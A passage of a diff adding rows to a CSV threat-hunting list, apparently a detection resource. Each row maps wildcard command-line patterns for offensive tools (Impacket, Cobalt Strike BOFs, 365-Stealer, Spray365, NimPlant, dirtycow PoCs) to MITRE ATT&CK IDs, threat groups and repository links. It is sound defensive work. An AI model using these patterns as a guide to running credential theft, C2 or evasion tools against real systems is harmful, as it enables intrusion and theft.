Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* cups-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cups-queue-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --custom_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
+"* --custom-steal","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"* --custom-steal listusers*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"* --custom-steal onedrive*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"* --custom-steal onenote*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"* --custom-steal outlook*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"* --cve=* --command*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"* CVE-2023-38831-RaRCE*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"* cvs-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cvs-brute-repository.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -d * -dc * -nu 'neo4j' -np *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -d * -n * -m reverse*=","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z"
+"* -d * -n * -m rot13*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z"
+"* -d * -t axfr >*","offensive_tool_keyword","thoth","Automate recon for 
red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -d * -t zonewalk > *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -d * -t zonewalk*","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2336","516","2023-09-11T05:14:02Z","2010-12-16T03:25:49Z"
+"* -d * -u * -p * --listener * --target *$DC_HOST*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -d * -u *\* -p * --da*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z"
+"* -d *Active Protection DLL for 
SylantStrike*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
+"* -d:sleepmask*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"* daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -daisyserver *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"* darkcodersc *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z"
+"* darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z"
+"* daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --dbms=mysql -u *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"* --dc * -m custom --filter *objectCategory*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -dc-host * -spn * -impersonate *","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z"
+"* -dc-ip * -so *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -dc-ip * -computer-pass *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -dc-ip * -dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -dc-ip * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* --dc-ip * -request * -format hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"* -dc-ip * -target-ip *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* --dc-ip * --vuln --enabled*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -dc-ip *SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* dclist *","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dcow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z"
+"* dcow.cpp*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z"
+"* -DDONUT_EXE *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"* --deauth * -a TR:GT:AP:BS:SS:ID wlan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* decrypt *.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"* deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* default_logins.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"* 
Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
+"* DelegationBOF.c *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
+"* delegationx64.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
+"* delegationx86.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
+"* deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z"
+"* Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
+"* denied AXFR from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"* deploy_cobalt_beacon*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
+"* DesertFox.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z"
